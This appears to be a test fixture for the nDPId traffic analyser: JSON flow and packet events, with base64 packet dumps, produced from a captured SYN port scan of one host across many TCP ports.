-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":107,"source":"synscan.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9200,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":107,"source":"synscan.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAsersAACgGpbesEAAIQA2GNIzSI\/DdUoMYAAAAAGACBAAQnwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":108,"source":"synscan.pcap","alias":"nDPId-test","flow_id":103,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5903,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"synscan.pcap","alias":"nDPId-test","flow_id":103,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAsq6kAACYGdsmsEAAIQA2GNIzSFw\/dUoMYAAAAAGACDAAVgAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":109,"source":"synscan.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1067,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":109,"source":"synscan.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAsKewAADoG5IasEAAIQA2GNIzSBCvdUoMYAAAAAGACDAAoZAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":110,"source":"synscan.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":110,"source":"synscan.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAsObQAAC0G4b6sEAAIQA2GNIzSD6PdUoMYAAAAAGACCAAg7AAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":111,"source":"synscan.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":33899,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":111,"source":"synscan.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAs3g8AACoGQGOsEAAIQA2GNIzShGvdUoMYAAAAAGACDACoIwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":112,"source":"synscan.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058030,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058030,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":7676,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":112,"source":"synscan.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1278275058030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058030,"pkt":"ACYLMQczACWzv5HuCABFAAAsLuQAAC0G7I6sEAAIQA2GNIzSHfzdUoMYAAAAAGACCAASkwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":113,"source":"synscan.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058031,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14442,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":113,"source":"synscan.pcap","alias":"nDPId-test","flow_id":108,"flow_packet_id":1,"flow_last_seen":1278275058031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058031,"pkt":"ACYLMQczACWzv5HuCABFAAAsY6MAADsGqc+sEAAIQA2GNIzSOGrdUoMYAAAAAGACEADwJAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":114,"source":"synscan.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058031,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":31337,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":114,"source":"synscan.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":1,"flow_last_seen":1278275058031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058031,"pkt":"ACYLMQczACWzv5HuCABFAAAsaAkAACYGummsEAAIQA2GNIzSemndUoMYAAAAAGACDACyJQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":115,"source":"synscan.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058031,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1247,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":115,"source":"synscan.pcap","alias":"nDPId-test","flow_id":110,"flow_packet_id":1,"flow_last_seen":1278275058031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058031,"pkt":"ACYLMQczACWzv5HuCABFAAAsT64AACsGzcSsEAAIQA2GNIzSBN\/dUoMYAAAAAGACEAAjsAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":116,"source":"synscan.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058031,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1311,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":116,"source":"synscan.pcap","alias":"nDPId-test","flow_id":111,"flow_packet_id":1,"flow_last_seen":1278275058031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058031,"pkt":"ACYLMQczACWzv5HuCABFAAAs7g4AADoGIGSsEAAIQA2GNIzSBR\/dUoMYAAAAAGACDAAncAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":117,"source":"synscan.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058031,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9917,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":117,"source":"synscan.pcap","alias":"nDPId-test","flow_id":112,"flow_packet_id":1,"flow_last_seen":1278275058031,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058031,"pkt":"ACYLMQczACWzv5HuCABFAAAs1RQAACkGSl6sEAAIQA2GNIzSJr3dUoMYAAAAAGACCAAJ0gAAAgQFtA=="} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"synscan.pcap","alias":"nDPId-test","flow_id":109,"flow_packet_id":2,"flow_last_seen":1278275058093,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1278275058093,"pkt":"ACWzv5HuACYLMQczCABFAAAoAABAADYG0nZADYY0rBAACHppjNJGY57x3VKDGVAUAADweQAAAAAAAAAA"} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":119,"source":"synscan.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":65000,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"synscan.pcap","alias":"nDPId-test","flow_id":113,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsYKcAACgGv8usEAAIQA2GNIzT\/ejdU4MZAAAAAGACBAA2owAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"synscan.pcap","alias":"nDPId-test","flow_id":114,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1594,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"synscan.pcap","alias":"nDPId-test","flow_id":114,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsfsIAADMGlrCsEAAIQA2GNIzTBjrdU4MZAAAAAGACEAAiUgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"synscan.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":16080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"synscan.pcap","alias":"nDPId-test","flow_id":115,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsa1MAAC8Grh+sEAAIQA2GNIzTPtDdU4MZAAAAAGACEADpuwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"synscan.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32778,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"synscan.pcap","alias":"nDPId-test","flow_id":116,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsGhYAADsG81ysEAAIQA2GNIzTgArdU4MZAAAAAGACEACogQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":123,"source":"synscan.pcap","alias":"nDPId-test","flow_id":117,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4848,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"synscan.pcap","alias":"nDPId-test","flow_id":117,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsMvMAAC4G53+sEAAIQA2GNIzTEvDdU4MZAAAAAGACDAAZnAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":124,"source":"synscan.pcap","alias":"nDPId-test","flow_id":118,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7777,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"synscan.pcap","alias":"nDPId-test","flow_id":118,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAspfkAADsGZ3msEAAIQA2GNIzTHmHdU4MZAAAAAGACEAAKKwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":125,"source":"synscan.pcap","alias":"nDPId-test","flow_id":119,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":17877,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"synscan.pcap","alias":"nDPId-test","flow_id":119,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsKRwAACUG+lasEAAIQA2GNIzTRdXdU4MZAAAAAGACCADqtgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":126,"source":"synscan.pcap","alias":"nDPId-test","flow_id":120,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":3880,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":126,"source":"synscan.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAs13MAADUGO\/+sEAAIQA2GNIzTDyjdU4MZAAAAAGACCAAhZAAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":127,"source":"synscan.pcap","alias":"nDPId-test","flow_id":121,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":514,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"synscan.pcap","alias":"nDPId-test","flow_id":121,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsN7gAADgG2LqsEAAIQA2GNIzTAgLdU4MZAAAAAGACBAAyigAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":128,"source":"synscan.pcap","alias":"nDPId-test","flow_id":122,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14238,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"synscan.pcap","alias":"nDPId-test","flow_id":122,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsKvUAACsG8n2sEAAIQA2GNIzTN57dU4MZAAAAAGACEADw7QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":129,"source":"synscan.pcap","alias":"nDPId-test","flow_id":123,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"synscan.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAslWEAADoGeRGsEAAIQA2GNIzTB\/bdU4MZAAAAAGACDAAklgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":130,"source":"synscan.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8291,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"synscan.pcap","alias":"nDPId-test","flow_id":124,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsazkAADsGojmsEAAIQA2GNIzSIGPdUoMYAAAAAGACEAAILAAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":131,"source":"synscan.pcap","alias":"nDPId-test","flow_id":125,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058095,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058095,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3826,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":131,"source":"synscan.pcap","alias":"nDPId-test","flow_id":125,"flow_packet_id":1,"flow_last_seen":1278275058095,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275058095,"pkt":"ACYLMQczACWzv5HuCABFAAAsLfQAADkG4X6sEAAIQA2GNIzSDvLdUoMYAAAAAGACCAAhnQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":132,"source":"synscan.pcap","alias":"nDPId-test","flow_id":126,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275058096,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3077,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 